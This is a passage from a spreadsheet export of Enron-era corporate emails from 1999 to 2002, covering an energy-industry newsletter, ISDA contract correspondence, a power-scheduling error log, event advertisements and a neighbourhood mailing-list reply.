f you there, and for those of you who can't make it, we'll have a number of=_x000D_
 reports in the next briefing on what our speakers had to say, what the lat=_x000D_
est buzz in the industry is and what you need to look out for in the upcomi=_x000D_
ng months.     --Allison Robertshaw, Editor    FOCUS   Managing Energy Reso=_x000D_
urces in the Global Economy    The highly charged atmosphere of newly dereg=_x000D_
ulated markets, coupled with rapid changes in the energy sector, Enron's me=_x000D_
ltdown, and price volatility is forcing companies to reexamine the way they=_x000D_
 have traditionally looked at energy.  Once considered the Bermuda Triangle=_x000D_
 of the company balance sheet, the run up in energy prices is serving notic=_x000D_
e that ignoring energy management is a recipe for disaster. Suddenly, energ=_x000D_
y management has become a strategic issue that can burn a big hole in a cor=_x000D_
poration's budget.  The rapid changes in the energy industry have forced ma=_x000D_
ny companies to scramble to put together new business strategies, corporate=_x000D_
 and management structures and systems to cope with a new reality facing to=_x000D_
day's global corporation, that managing energy separates the winners from t=_x000D_
he losers in...   Click here for Full Story      INSIGHT   Staying Clean an=_x000D_
d Green in a Developing World    The environmental impact of greenhouse gas=_x000D_
 emissions, price volatility, investor unrest, globalization and increased =_x000D_
competition are the demon spawn of uncertainty and doubt clouding the energ=_x000D_
y horizon as the New Year unfolds.  With the bright dream that once was Enr=_x000D_
on turning into a pre-dawn nightmare, the investment community is turning i=_x000D_
ts attention to "the next big thing". Recent indications are that the risk =_x000D_
takers, angel investors to venture capitalists and investment banks, are be=_x000D_
ginning to drag clean energy technologies out of the closet into the clear =_x000D_
light of day.  The sheer size and scope of the energy marketplace is a comp=_x000D_
elling target for those seeking entry into the burgeoning hydrogen economy.=_x000D_
 Clean-energy technologies -- including solar photovoltaics, wind power, mi=_x000D_
croturbines, and fuel cells -- represent a fast-growing segment of the mark=_x000D_
etplace...   Click here for Full Story      ADVERTISEMENT  [IMAGE] CO2 Trad=_x000D_
ing USA 2002 The Radisson Hotel, Chicago 19-21 June 2002  Interest in Eyefo=_x000D_
renergy's forthcoming conference Emissions Trading Europe 2002 was high lon=_x000D_
g before the program was even published (if you hurry you might still be ab=_x000D_
le to register!).  In the light of this success, we are extending our emiss=_x000D_
ions trading series of events to the U.S.A.   CO2 Trading USA 2002 will tak=_x000D_
e place 19-21 June at The Radisson Hotel, Chicago.  The website has just go=_x000D_
ne live, invitations have been sent to industry speakers, and sponsorship o=_x000D_
ffers are being discussed.  To get involved, simply register your interest =_x000D_
at www.eyeforenergy.com/co2usa , email Sarah Robinson at srobinson@eyeforen=_x000D_
ergy.com  or call +44 20 7375 7555.  [IMAGE]  NEWS ROUND UP - WEEK IN REVIE=_x000D_
W   World Energy Markets at a Crossroads    The publication of WorldPower 2=_x000D_
002 once again provides industry participants with comprehensive coverage o=_x000D_
f issues of importance to the changing state of the world's power and energ=_x000D_
y markets.  Last year began with the unfolding saga and consequences of the=_x000D_
 Californian power market crisis, which led to a major re-think in US energ=_x000D_
y policy. After September 11th, economic influences aside, western economie=_x000D_
s reviewed the security of their reserves and sources. Finally with the imp=_x000D_
losion of...   Click here for Full Story     Oregon Set For Electricity Der=_x000D_
egulation March 1   February 6, 2002----With the harsh reality of Californi=_x000D_
a's deregulation efforts and the meltdown of Enron, drawing consumers atten=_x000D_
tion Oregon's attempts at competition are set to debut on March 1.   So far=_x000D_
, three nonutility suppliers, known as "electricity service suppliers," hav=_x000D_
e received state...   Click here for Full Story     Lay Throws in Towel, Qu=_x000D_
its Enron Board   February 6, 2002----Faced with increasing congressional s=_x000D_
crutiny Kenneth lay, has resigned from the board of directors of Enron Corp=_x000D_
. The fallen energy giant's former chairman and chief executive resigned fr=_x000D_
om the board Monday, cutting his last tie beyond stock ownership to the nat=_x000D_
ural gas pipeline...   Click here for Full Story     Federal Regulator's Ca=_x000D_
st Wary Eye on New Jersey Pollution Trading Scheme    February 6, 2002---A =_x000D_
New Jersey pollution credit trading scheme, that allows industries to buy a=_x000D_
nd sell the right to pollute has come under the scrutiny of federal regulat=_x000D_
ors. Regulators specifically want to know whether the setup lets companies =_x000D_
lie about how much they clean up the air...   Click here for Full Story    =_x000D_
 Bush Offers Tax Breaks for Renewable Energy    February 5, 2002--- The Bus=_x000D_
h Administration has proposed significant tax incentives aimed at encouragi=_x000D_
ng energy efficiency and use of renewable resources, while slashing funds f=_x000D_
or oil and natural gas research programs.  The President proposed a 2.7 per=_x000D_
cent increase in the Energy Department's discretionary spending for the 200=_x000D_
3-spending year. Under the new budget the Energy Department would get $21.9=_x000D_
2 billion, up $582.2 million from current levels...   Click here for Full S=_x000D_
tory     Sunoco Logistics IPO Raises $101 Million    February 5, 2002---Sun=_x000D_
oco Logistics Partners L.P (SXL),  has floated a initial public offering, r=_x000D_
aising a reported $101.25 million, According to Lehman Brothers Inc., SXL, =_x000D_
which operates oil pipelines and terminal facilities, sold 5 million units =_x000D_
at $20.25 each, within the expected price range of...   Click here for Full=_x000D_
 Story     Sempra Energy Trading Takes Over Enron Metals Unit    February 5=_x000D_
, 2002---Sempra Energy's wholesale trading arm Sempra Energy Trading, has s=_x000D_
uccessfully taken over the operations of London based Enron Metal Ltd. A le=_x000D_
ading metals trader on the London Metals Exchange, Enron Metals will now be=_x000D_
come knows as Sempra Metals Ltd, and will continue to be based...   Click h=_x000D_
ere for Full Story     Logica Energizes European Liberalized Markets    Feb=_x000D_
ruary 5, 2002--- Logica is giving utilities in the newly liberalized market=_x000D_
s of the Netherlands and the Czech Republic to "go live" on schedule. In bo=_x000D_
th cases Logica has signed on to operate the IT networks giving consumers t=_x000D_
he ability to pick a supplier of choice...   Click here for Full Story     =_x000D_
 Latest News Now!       [IMAGE]     EDITORIAL [IMAGE] The hottest topic in =_x000D_
the energy industry this week remains the Enron disaster...    ARTICLES [IM=_x000D_
AGE] Managing Energy Resources in the Global Economy [IMAGE] Staying Clean =_x000D_
and Green in a Developing World    NEWS ROUND UP [IMAGE] World Energy Marke=_x000D_
ts at a Crossroads   [IMAGE] Oregon Set For Electricity Deregulation March =_x000D_
1   [IMAGE] Lay Throws in Towel, Quits Enron Board   [IMAGE] Federal Regula=_x000D_
tor's Cast Wary Eye on New Jersey Pollution Trading Scheme   [IMAGE] Bush O=_x000D_
ffers Tax Breaks for Renewable Energy   [IMAGE] Sunoco Logistics IPO Raises=_x000D_
 $101 Million   [IMAGE] Sempra Energy Trading Takes Over Enron Metals Unit =_x000D_
  [IMAGE] Logica Energizes European Liberalized Markets      EVENTS [IMAGE]=_x000D_
  Energy Exchanges Online Europe   [IMAGE]  Emissions Trading Europe 2002  =_x000D_
 [IMAGE]  Weather Trading Europe 2002   [IMAGE]  Energy Exchanges Online II=_x000D_
I   [IMAGE]  CO2 Trading USA 2002 (new)      SUBSCRIBE   Please  enter your=_x000D_
 email address below to subscribe  to the EyeForEnergy newsletter. Thank yo=_x000D_
u         UNSUBSCRIBE  To  unsubscribe from the EyeForEnergy newsletter  pl=_x000D_
ease enter your email below. Thank you       If you have any comments about=_x000D_
 this newsletter  or you would like to suggest future topics or  industry r=_x000D_
elated news, please email   bruno@eyeforenergy.com      [IMAGE]         =09_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 18 Dec 2001 11:54:47 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'benjamin@wt.net'})</t>
  </si>
  <si>
    <t>Re: *EMCA* Chapter 42 etc.</t>
  </si>
  <si>
    <t xml:space="preserve">Mike,_x000D_
_x000D_
Welcome back!  EMCA can use all the geophysical and_x000D_
geological expertise we can get!  If you come to the potluck_x000D_
tonight you may meet as many as five others in the industry!_x000D_
_x000D_
-Ben Sloan_x000D_
chevrontexaco geologist_x000D_
_x000D_
_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; &lt;tt&gt;_x000D_
&gt; Greetings!? I've joined the group again...&lt;BR&gt;_x000D_
&gt; &lt;BR&gt;_x000D_
&gt; You may have seen that 611 Peden has finally been torn_x000D_
&gt; down and is slated to&lt;BR&gt;_x000D_
&gt; be redeveloped as two 3-story townhomes.? As the_x000D_
&gt; result of the prevailing&lt;BR&gt;_x000D_
&gt; building line application for Peden, the new houses will_x000D_
&gt; be set back 21' as&lt;BR&gt;_x000D_
&gt; with other properties on the block. &lt;BR&gt;_x000D_
&gt; &lt;BR&gt;_x000D_
&gt; Mike Yates&lt;BR&gt;_x000D_
&gt; Geophysicist, Technology Division&lt;BR&gt;_x000D_
&gt; Paradigm Geophysical? &lt;a_x000D_
&gt; href=3D"http://www.paradigmgeo.com"&gt;http://www.paradigmgeo.c_x000D_
&gt; om&lt;/a&gt;&lt;BR&gt;_x000D_
&gt; &lt;BR&gt;_x000D_
&gt; Tel:?? 713 393 4955&lt;BR&gt;_x000D_
&gt; Fax:? 713 393 4801&lt;BR&gt;_x000D_
&gt; Mob: 713 858 6406&lt;BR&gt;_x000D_
&gt; &lt;BR&gt;_x000D_
&gt; &lt;BR&gt;_x000D_
&gt; &lt;/tt&gt;_x000D_
&gt;_x000D_
&gt; &lt;br&gt;_x000D_
&gt;_x000D_
&gt; &lt;!-- |**|begin egp html banner|**| --&gt;_x000D_
&gt;_x000D_
&gt; &lt;table border=3D0 cellspacing=3D0 cellpadding=3D2&gt;_x000D_
&gt; &lt;tr bgcolor=3D#FFFFCC&gt;_x000D_
&gt; &lt;td align?nter&gt;&lt;font size=3D"-1" color=3D#003399&gt;&lt;b&gt;Yahoo!_x000D_
&gt; Groups Sponsor&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;_x000D_
&gt; &lt;/tr&gt;_x000D_
&gt; &lt;tr bgcolor=3D#FFFFFF&gt;_x000D_
&gt; &lt;td align?nter widthG0&gt;&lt;table border=3D0 cellpadding=3D0_x000D_
&gt; cellspacaaing=3D0&gt;_x000D_
&gt; &lt;tr&gt;_x000D_
&gt; &lt;td align?nter&gt;&lt;font face=3Darial_x000D_
&gt; size=3D-2&gt;ADVERTISEMENT&lt;/font&gt;&lt;br&gt;&lt;a_x000D_
&gt; href=3D"http://rd.yahoo.com/M=178320.1681224.3270152.1261774_x000D_
&gt; /D=3Degroupweb/S=1705044493:HM/A?9173/R=3D0/*http://www.fast_x000D_
&gt; web.com/ib/yahoo-76f"&gt;&lt;img_x000D_
&gt; src=3D"http://us.a1.yimg.com/us.yimg.com/a/fa/fastweb/newblu_x000D_
&gt; e300x250.gif" alt=3D"" width=3D"300" height=3D"250"_x000D_
&gt; border=3D"0"&gt;&lt;/a&gt;&lt;/td&gt;_x000D_
&gt; &lt;/tr&gt;_x000D_
&gt; &lt;/table&gt;&lt;/td&gt;_x000D_
&gt; &lt;/tr&gt;_x000D_
&gt; &lt;tr&gt;&lt;td&gt;&lt;img alt=3D"" width=3D1 height=3D1_x000D_
&gt; src=3D"http://us.adserver.yahoo.com/l?M=178320.1681224.32701_x000D_
&gt; 52.1261774/D=3Degroupmail/S=1705044493:HM/A?9173/rand759_x000D_
&gt; 12855"&gt;&lt;/td&gt;&lt;/tr&gt;_x000D_
&gt; &lt;/table&gt;_x000D_
&gt;_x000D_
&gt; &lt;!-- |**|end egp html banner|**| --&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; &lt;br&gt;_x000D_
&gt; &lt;tt&gt;_x000D_
&gt; To unsubscribe from this group, send an email to:&lt;BR&gt;_x000D_
&gt; emca-unsubscribe@egroups.com&lt;BR&gt;_x000D_
&gt; &lt;BR&gt;_x000D_
&gt; &lt;/tt&gt;_x000D_
&gt; &lt;br&gt;_x000D_
&gt;_x000D_
&gt; &lt;br&gt;_x000D_
&gt; &lt;tt&gt;Your use of Yahoo! Groups is subject to the &lt;a_x000D_
&gt; href=3D"http://docs.yahoo.com/info/terms/"&gt;Yahoo! Terms of_x000D_
&gt; Service&lt;/a&gt;.&lt;/tt&gt;_x000D_
&gt; &lt;/br&gt;_x000D_
&gt;_x000D_
&gt; &lt;/body&gt;&lt;/html&gt;_x000D_
&gt;_x000D_
_x000D_
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;_x000D_
Tiny Wireless Camera under $80!_x000D_
Order Now! FREE VCR Commander!_x000D_
Click Here - Only 1 Day Left!_x000D_
http://us.click.yahoo.com/75YKVC/7.PDAA/ySSFAA/NoOolB/TM_x000D_
---------------------------------------------------------------------~-&gt;_x000D_
_x000D_
To unsubscribe from this group, send an email to:_x000D_
emca-unsubscribe@egroups.com_x000D_
_x000D_
=20_x000D_
_x000D_
Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/=_x000D_
=20_x000D_
</t>
  </si>
  <si>
    <t>Mon, 11 Oct 1999 08:08:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lucy.ortiz@enron.com', 'sara.shackleton@enron.com'})</t>
  </si>
  <si>
    <t>Spark Spread Confirmation</t>
  </si>
  <si>
    <t xml:space="preserve">Sara_x000D_
_x000D_
I will be out the rest of the week on a family emergency. Lucy should be able _x000D_
to help._x000D_
_x000D_
---------------------- Forwarded by Dale Neuner/HOU/ECT on 10/11/99 03:07 PM _x000D_
---------------------------_x000D_
Sean Black   10/11/99 11:42 AM_x000D_
_x000D_
To: Dale Neuner/HOU/ECT@ECT, Barton Clark/HOU/ECT@ECT, Sara _x000D_
Shackleton/HOU/ECT@ECT_x000D_
cc: Chris Holmes/HOU/ECT@ECT _x000D_
Subject: Spark Spread Confirmation_x000D_
_x000D_
Dale/Bart/Sara,_x000D_
_x000D_
We need to clean up the confirmation and any other legal information that _x000D_
accompanies it (Bart/Sara, is the attached Omnibus T&amp;Cs we proposed to use _x000D_
standard documentation or are any revisions necessary prior to sending out to _x000D_
CCSI?) so that we can send this out to CCSI for their review._x000D_
_x000D_
Looking at the confirmation, I see the following items that need to be _x000D_
revised:_x000D_
_x000D_
Trade date/Signing date - Not yet confirmed; will insert date the deal is _x000D_
closed when it is known._x000D_
Need to specify which curve to look at in the Gas Daily Index (there is a low _x000D_
high and a mid or average); we did not specify which one we would refer to _x000D_
previously_x000D_
Do we need to replace ECT with ENA throughout??_x000D_
Catalytica should be Catalytica Combustion Systems (the subsidiary not the _x000D_
parent)_x000D_
Need to add in details about CCSI (name/title/payment account info etc.)_x000D_
_x000D_
_x000D_
Sean - I will get the info for 5 from CCSI_x000D_
_x000D_
Dale - Could you correct number 2, advise on number 3 and review the document _x000D_
again to see if any other information is lacking that should be included?_x000D_
_x000D_
Bart/Sara  - Could you advise about the details on the Omnibus (I have _x000D_
misplaced any copy of this)  I thought there were some credit issues that _x000D_
needed to be filled in at the bottom of this?_x000D_
_x000D_
If anyone else could advise on other items that need to be addressed with _x000D_
either the Confirmation and/or the Omnibus agreement, now is the time!_x000D_
_x000D_
Regards,_x000D_
</t>
  </si>
  <si>
    <t>Tue, 5 Feb 2002 18:37:57 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 2/5/02; HourAhead hour: 17;</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
Start Date: 2/5/02; HourAhead hour: 17;  No ancillary schedules awarded.  No variances detected. _x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2002020517.txt_x000D_
!!!General SQL error._x000D_
Couldn't update; currently locked by user 'Admin' on machine 'NAHOU-TRDTS5'._x000D_
Table_x000D_
_x000D_
---- Energy Import/Export Schedule ----_x000D_
*** Final schedule not found for preferred schedule._x000D_
     Details:_x000D_
_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: ECTstNW_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 2/5/02_x000D_
  TIE_POINT: MALIN_5_RNDMTN_x000D_
  INTERCHG_ID: ENRJ_CISO_3000_x000D_
  ENGY_TYPE: FIRM_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 24 Oct 2000 03:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'bob.crane@enron.com'})</t>
  </si>
  <si>
    <t>Re: poaching your guys</t>
  </si>
  <si>
    <t>Bob _x000D_
_x000D_
I talked to Kevin about these two guys and he feels they are critical to our _x000D_
business.  Broadband has taken 5 guys out of East Power and left us short. _x000D_
_x000D_
Sorry</t>
  </si>
  <si>
    <t>Mon, 4 Feb 2002 13:56:14 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'energyseminars@energyseminars.com'})</t>
  </si>
  <si>
    <t>Is your accounting in compliance?</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
 _x000D_
 _x000D_
      Energy Seminars, Inc.: Is your shop FASB 133 Compliant?     Is Your Shop FASB 133  Compliant?    Attendees of this  one-day workshop  receive and work with the  535-page guide to FASB Statement 133.  7.0 hours CPE Credit  available.      Houston TX * February  21   For more information or to register  on-line:   www.energyseminars.com      or call:  281-362-7979     Please share this information with your  colleagues.     email removal:  remove@energyseminars.com         Send the  content of this message to an interested friend.       Colleague's Email Address:   Add Your Personal Message Below:   	_x000D_
_x000D_
_x000D_
 - f133new.gif </t>
  </si>
  <si>
    <t>Wed, 20 Dec 2000 00:05:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'j-sharkey@kellogg.nwu.edu'})</t>
  </si>
  <si>
    <t>Re: Saturday Night</t>
  </si>
  <si>
    <t>Unfortunately I leave on the 30th._x000D_
_x000D_
At 12:40 AM 12/20/00 -0800, you wrote:_x000D_
_x000D_
&gt;Hey sharkey.  I will be out of town the 23rd thru the 30th.  How long are_x000D_
&gt;you going to be in town for?_x000D_
_x000D_
_x000D_
James Sharkey_x000D_
Northwestern University, Evanston, IL.  USA_x000D_
j-sharkey@kellogg.nwu.edu</t>
  </si>
  <si>
    <t>Fri, 28 Jul 2000 04:21:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>HEAs 2000 Sporting Clays Tournament - August 15</t>
  </si>
  <si>
    <t>August 1st is just around the corner, and that's your deadline for entering _x000D_
the "private drawing" at this year's Sporting Clays Tournament.  If we have _x000D_
your registration and payment by next Tuesday, your name goes in the hat for _x000D_
a great shotgun!_x000D_
_x000D_
Visit our website at www.houstonenergy.org for the details of this awesome _x000D_
event, and send in your registration today!  Look forward to seeing you _x000D_
there..._x000D_
_x000D_
_x000D_
-----------------------------------------------------------_x000D_
This message was sent by:_x000D_
_x000D_
Teresa Knight, Executive Director_x000D_
Houston Energy Association (HEA)_x000D_
Phone: (713) 651-0551_x000D_
Fax: (713) 659-6424_x000D_
tknight@houstonenergy.org_x000D_
_x000D_
If you would like to have your email address removed from our mailing list, _x000D_
please click the link below to the HEA Home page, where you will find a _x000D_
mini-form to remove your name automatically._x000D_
_x000D_
http://www.houstonenergy.org/</t>
  </si>
  <si>
    <t>Wed, 28 Mar 2001 03:54:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sbreen@czn.com', 'coganja@aol.com'})</t>
  </si>
  <si>
    <t>Griffith Economics</t>
  </si>
  <si>
    <t xml:space="preserve">John/Sean:_x000D_
_x000D_
I am a little confused on how the pricing indicated in your term sheet would _x000D_
work.  I think if we review the attached it will clarify things.  Please call _x000D_
me later to discuss.  I want to make sure we understand how the pricing would _x000D_
work for Griffith as well as Enron to Citizens.  _x000D_
_x000D_
Also, I think the Commodity section of your proposal term sheet has some _x000D_
missing words.  You don't seem to be adding the spread value of interstate _x000D_
transport to the Commodity charge.  _x000D_
_x000D_
I will be out for an hour.  Back at 1:00 Portland time._x000D_
_x000D_
Chris_x000D_
</t>
  </si>
  <si>
    <t>Sat, 5 May 2001 01:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'owner-peaker@energy.ca.gov'})</t>
  </si>
  <si>
    <t>frozenset({'peaker@energy.ca.gov', 'newsreleases@energy.ca.gov'})</t>
  </si>
  <si>
    <t>[PEAKER-LIST] Staff Assessment for Hanford Peaker Project</t>
  </si>
  <si>
    <t xml:space="preserve">The Staff Assessment for the Hanford Energy Park Peaker Project is_x000D_
now available on our website.  please go to:_x000D_
_x000D_
http://www.energy.ca.gov/sitingcases/peakers/hanford/documents/_x000D_
_x000D_
Bob Aldrich_x000D_
_x000D_
--_x000D_
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *_x000D_
If you would like to unsubscribe from this_x000D_
list.  Please use our form located at:_x000D_
_x000D_
http://www.energy.ca.gov/html/listservers.html_x000D_
_x000D_
Bob Aldrich_x000D_
Webmaster_x000D_
California Energy Commission_x000D_
_x000D_
* * * * * * * * * *  * * * * * * * * * *   * * * * * * * * * * </t>
  </si>
  <si>
    <t>Thu, 24 May 2001 07:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'frank.davis@enron.com', 'marilyn.colbert@enron.com', 'nidia.mendoza@enron.com', 'souad.mahmassani@enron.com', 'yolanda.cordova-gilbert@enron.com', 'william.bradford@enron.com', 'amber.ebow@enron.com', 'rick.suttle@enron.com', 'molly.harris@enron.com', 'gordon.heaney@enron.com', 'shemeika.landry@enron.com', 'connie.sutton@enron.com', 'wendi.lebrocq@enron.com', 'russell.diamond@enron.com', 'mary.solmonson@enron.com', 'brant.reves@enron.com', 'diane.ellstrom@enron.com', 'laurel.adams@enron.com', 'david.dupre@enron.com', 'andrea.guillen@enron.com', 'larry.hunter@enron.com', 'jefferson.sorenson@enron.com', 'jean.bell@enron.com', 'charlie.hoang@enron.com', 'dianne.seib@enron.com', 'mark.taylor@enron.com', 'harry.bucalo@enron.com', 'julie.meyers@enron.com', 'bruce.mills@enron.com', 'anthony.campos@enron.com', 'adnan.patel@enron.com', 'bill.hare@enron.com', 'sheetal.patel@enron.com', 'sara.shackleton@enron.com', 'susan.flynn@enron.com', 'jason.moore@enron.com', 'debbie.brackett@enron.com', 'samuel.schott@enron.com', 'pamela.sonnier@enron.com', 'veronica.espinoza@enron.com', 'tana.jones@enron.com', 'sheri.thomas@enron.com', 'tracy.ngo@enron.com', 'carol.clair@enron.com', 'karen.lambert@enron.com', 'leslie.reeves@enron.com', 'derek.bailey@enron.com', 'jarrod.cyprow@enron.com', 'kevin.meredith@enron.com', 'bob.bowen@enron.com', 'bernice.rodriguez@enron.com'})</t>
  </si>
  <si>
    <t>Trioco Resources Inc.</t>
  </si>
  <si>
    <t>We have received an executed Master Agreement:_x000D_
_x000D_
Type of Contract:  ISDA Master Agreement (Multicurrency-Cross Border)_x000D_
_x000D_
Effective Date:   April 26, 2001_x000D_
_x000D_
Enron Entity:   Enron Canada Corp._x000D_
_x000D_
Counterparty:   Trioco Resources Inc._x000D_
_x000D_
Transactions Covered:  Approved for all products with the exception of: _x000D_
Foreign Exchange    _x000D_
_x000D_
Confirming Entity:  Enron Canada Corp._x000D_
_x000D_
Governing Law:   Province of Alberta_x000D_
_x000D_
_x000D_
Copies will be distributed  _x000D_
_x000D_
_x000D_
Cordially,_x000D_
Susan S. Bailey_x000D_
Enron North America Corp._x000D_
1400 Smith Street, Suite 3806A_x000D_
Houston, Texas 77002_x000D_
Phone: (713) 853-4737_x000D_
Fax: (713) 646-3490_x000D_
E:mail:  Susan.Bailey@enron.com</t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 10:34:25 -0800 (PST)</t>
  </si>
  <si>
    <t>Enron Japan Corp.</t>
  </si>
  <si>
    <t>_x000D_
Sara,_x000D_
_x000D_
Please let me know if the ISDA Master Agreement between RMT and Enron Japan Corp. is ready for execution.   The file is with you for your for initials._x000D_
_x000D_
You may not have initialed-off on the agreement yet -- because you were going to check with Mark as to possibly adding in the online language.   _x000D_
_x000D_
Let me know if I may be of assistance._x000D_
_x000D_
Regards,_x000D_
Susan S. Bailey_x000D_
Senior Legal Specialist_x000D_
Enron Wholesale Services_x000D_
Legal Department_x000D_
1400 Smith Street, Suite 3803A_x000D_
Houston, Texas 77002_x000D_
phone: (713) 853-4737_x000D_
fax: (713) 646-3490_x000D_
email: susan.bailey@ enron.com</t>
  </si>
  <si>
    <t>Thu, 22 Mar 2001 06:14:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: New Albany Plant - revised</t>
  </si>
  <si>
    <t xml:space="preserve">Jim,_x000D_
 I will work on the Transaction Agreement which will go with the Master Sales _x000D_
Contract.  I just go a voice mail from Credit indicating who was working on _x000D_
your deal.  I am waiting for a credit worksheet from them so that I can start _x000D_
on the Contract.  Once the contract is completed, I will prepare the _x000D_
Transaction Agreement.  I will need to talk with you cause I noted several _x000D_
omissions in the language.  Under certain conditions, the transporter will _x000D_
not allow the over supplier to resell the volumes, they may be merely cashed _x000D_
out.  Do you agree.  What is the Purchase Index?  Is it Inside FERC Henry Hub _x000D_
first of the month  or is it some other index or is it daily.  Let's _x000D_
discuss.  I will be here today and next week.  Friday is iffy._x000D_
_x000D_
_x000D_
_x000D_
	Jim Homco_x000D_
	03/22/2001 01:42 PM_x000D_
		 _x000D_
		 To: Dan J Hyvl/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: New Albany Plant - revised_x000D_
_x000D_
Dan - made a few changes... also, I have copy of Columbia's_x000D_
FTS-1 and ITS-1 transport agreements as referenced below._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 17 Oct 2001 06:25:44 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jennifer.velasco@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'w..white@enron.com', 'nancy.hernandez@enron.com', 'james.new@enron.com', 'mike.jordan@enron.com', 'r..brackett@enron.com', 'clara.carrington@enron.com', 'lloyd.fleming@enron.com', 'sue.vasan@enron.com', 'd..powell@enron.com', 'david.hardy@enron.com', 'c..gossett@enron.com', 'todd.hall@enron.com', 'chris.abel@enron.com', 'wanda.curry@enron.com', 'shona.wilson@enron.com'})</t>
  </si>
  <si>
    <t>10/16 Unofficialized Book List</t>
  </si>
  <si>
    <t xml:space="preserve">Please see the attached report for 10/16._x000D_
_x000D_
Thank you._x000D_
_x000D_
Jennifer Velasco_x000D_
Risk Analytics_x000D_
X 5-2526_x000D_
_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Tue, 18 Jul 2000 06:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'peggy.banczak@enron.com'})</t>
  </si>
  <si>
    <t>Re: Enron Monterrey finance contract</t>
  </si>
  <si>
    <t xml:space="preserve">I have not responded yet, mostly because I don't know the answer.  _x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
From: Peggy Banczak@ECT on 07/18/2000 01:46 PM_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Enron Monterrey finance contract_x000D_
_x000D_
Kay:  Have you responded to this email or would you like me to do so?_x000D_
----- Forwarded by Peggy Banczak/HOU/ECT on 07/18/2000 01:45 PM -----_x000D_
_x000D_
	Brian D Barto@ENRON_DEVELOPMENT_x000D_
	07/18/2000 11:10 AM_x000D_
		_x000D_
		 To: william.danaher@ps.ge.com @ ENRON_x000D_
		 cc: Kay Mann@ENRON, Peggy Banczak@ECT, Steve Irvin@ECT, _x000D_
Jeffreye.smith@ps.ge.com_x000D_
		 Subject: Re: Enron Monterrey finance contract_x000D_
_x000D_
William:_x000D_
_x000D_
I have forwarded this email to Kay Mann and Peggy Banczak, whom I believe _x000D_
have the information you are requesting.  I expect you will hear from them _x000D_
shortly._x000D_
_x000D_
Thanks_x000D_
_x000D_
BB_x000D_
_x000D_
_x000D_
_x000D_
william.danaher@ps.ge.com on 07/17/2000 04:55:06 PM_x000D_
To: Brian.D.Barto@enron.com_x000D_
cc: jeffreye.smith@ps.ge.com _x000D_
_x000D_
Subject: Enron Monterrey finance contract_x000D_
_x000D_
_x000D_
Brian,_x000D_
I work with Jeff Smith in GE Power Systems commercial finance for the Mexico_x000D_
region. Can you provide me the name/phone of a finance contact in Enron who_x000D_
can provide the bank address, account number, etc. for Enron, in order for_x000D_
GE to issue the $25MM refund to Enron (under the termination agreement dated_x000D_
June 22nd)? Thanks._x000D_
_x000D_
Bill Danaher_x000D_
phone 518-385-5414_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 31 May 2001 07:59:19 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'torrey.moorer@enron.com', 'bob.shults@enron.com', 'louise.kitchen@enron.com', 'jennifer.rosado@enron.com', 'andy.zipper@enron.com', 'dawn.mcdonald@enron.com', 'tammie.schoppe@enron.com', 'kimberly.hillis@enron.com', 'tara.sweitzer@enron.com', 'jennifer.denny@enron.com', 'michael.bridges@enron.com'})</t>
  </si>
  <si>
    <t>Dynegy-ICE VOL May30</t>
  </si>
  <si>
    <t>_x000D_
 _x000D_
_x000D_
_x000D_
There are 2 sheets in the following attachment that contain Enron transactional data for the Intercontinental Exchange (ICE) and Dynegy Direct, labeled as follows:_x000D_
"Enron Activity - Dynegy Direct"_x000D_
"Enron Activity - ICE"_x000D_
_x000D_
  _x000D_
_x000D_
Note: Total activity for Dynegy Direct is not available, therefore Enron's Percentage can not be calculated._x000D_
_x000D_
Let me know if you have any questions or comments._x000D_
_x000D_
_x000D_
Adam Johnson_x000D_
EnronOnline_x000D_
713-345-4877_x000D_
_x000D_
_x000D_
&lt;Embedded Picture (Device Independent Bitmap)&gt;</t>
  </si>
  <si>
    <t>Fri, 25 Jan 2002 11:47:53 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'twayne@waynedirect.com'})</t>
  </si>
  <si>
    <t>frozenset({'sshackl@enron.com'})</t>
  </si>
  <si>
    <t>Texas Attorneys Life Insurance Program</t>
  </si>
  <si>
    <t>Dear Ms. St. Clair:_x000D_
_x000D_
       TEXAS ATTORNEYS LIFE INSURANCE PROGRAM_x000D_
                   TRANSAMERICA OCCIDENTAL LIFE_x000D_
_x000D_
